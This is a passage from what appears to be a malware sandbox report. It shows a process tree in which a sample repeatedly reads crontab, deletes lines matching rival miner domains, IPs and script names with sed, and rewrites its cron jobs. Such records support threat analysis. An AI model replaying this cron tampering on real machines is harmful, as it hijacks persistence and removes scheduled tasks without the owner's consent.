                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2545
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /ash/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2543
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /mr.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2547
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2546
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2551
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /185.181.10.234/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2550
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2549
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2554
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /localhost.xyz/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2553
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2557
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /45.137.151.106/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2555
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /111.90.159.106/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2559
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /github/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2562
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2561
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2566
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /bigd1ck.com/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2565
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /xmr.ipzse.com/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2569
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /185.181.10.234/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2571
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2575
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /146.71.79.230/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2574
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2573
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2578
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /122.51.164.83/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2577
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2581
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /newdat.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2579
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /lib.pygensim.com/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2583
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2582
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2587
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /t.amynx.com/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2585
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2590
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /update.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2589
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2593
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /systemd-service.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2591
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /pg_stat.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2595
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2599
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /sleep/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2598
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2597
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2602
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /oka/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2601
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2605
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /linux1213/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2603
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed "/#wget/d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2607
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed "/#curl/d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2610
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2609
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2614
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /zsvc/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2613
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2617
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /givemexyz/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /world/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2619
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2623
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /1.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2622
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
